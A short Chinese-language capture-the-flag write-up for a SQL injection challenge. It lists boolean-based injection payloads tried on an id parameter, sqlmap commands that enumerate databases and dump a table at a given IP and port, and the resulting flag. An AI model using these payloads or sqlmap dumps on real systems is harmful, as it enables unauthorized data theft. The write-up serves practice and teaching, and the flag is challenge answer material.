题目描述
在线环境
解题思路
方法1 尝试SQL注入
?id=1 or 1=1--+
?id=1'or 1=1--+
?id=1"or 1=1--+
?id=1)or 1=1--+
?id=1')or 1=1--+
?id=1") or 1=1--+
?id=1"))or 1=1--+
都均无回显
?id=1' or '1'='1
回显出flag
Please enter ID,and Try to bypass
nice : congratulations
Flag Is : cyberpeace{9d09c60109807334145fe7162ccfdbb0}
方法2 sqlmap注入
sqlmap -u http://61.147.171.105:55016/?id=1 -dbs
爆cybert表中的数据
sqlmap -u http://61.147.171.105:55016/?id=1 -T cyber --dump
flag为:cyberpeace{9d09c60109807334145fe7162ccfdbb0}